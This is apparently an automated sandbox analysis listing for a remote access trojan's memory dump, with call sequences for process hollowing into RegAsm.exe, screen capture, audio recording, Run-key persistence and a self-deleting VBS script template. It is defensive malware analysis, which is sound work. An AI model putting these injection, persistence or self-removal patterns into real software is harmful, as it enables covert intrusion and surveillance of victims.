                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                APIs
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                Strings
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                Strings
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                • HeapFree.KERNEL32(00000000), ref: 004120EE
                                Yara matches
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                • DeleteDC.GDI32(00000000), ref: 00418F2A
                                • DeleteDC.GDI32(00000000), ref: 00418F2D
                                • DeleteObject.GDI32(00000000), ref: 00418F30
                                • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                • DeleteDC.GDI32(00000000), ref: 00418F62
                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                • GetIconInfo.USER32 ref: 00418FBD
                                • DeleteObject.GDI32(?), ref: 00418FEC
                                • DeleteObject.GDI32(?), ref: 00418FF9
                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                • DeleteDC.GDI32(?), ref: 0041917C
                                • DeleteDC.GDI32(00000000), ref: 0041917F
                                • DeleteObject.GDI32(00000000), ref: 00419182
                                • GlobalFree.KERNEL32(?), ref: 0041918D
                                • DeleteObject.GDI32(00000000), ref: 00419241
                                • GlobalFree.KERNEL32(?), ref: 00419248
                                • DeleteDC.GDI32(?), ref: 00419258
                                • DeleteDC.GDI32(00000000), ref: 00419263
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 479521175-865373369
                                • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-332907002
                                • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63771986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2557013105
                                • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32 ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                • API String ID: 2649220323-436679193
                                • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                • API String ID: 738084811-2094122233
                                • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                • API String ID: 1646373207-255920310
                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                APIs
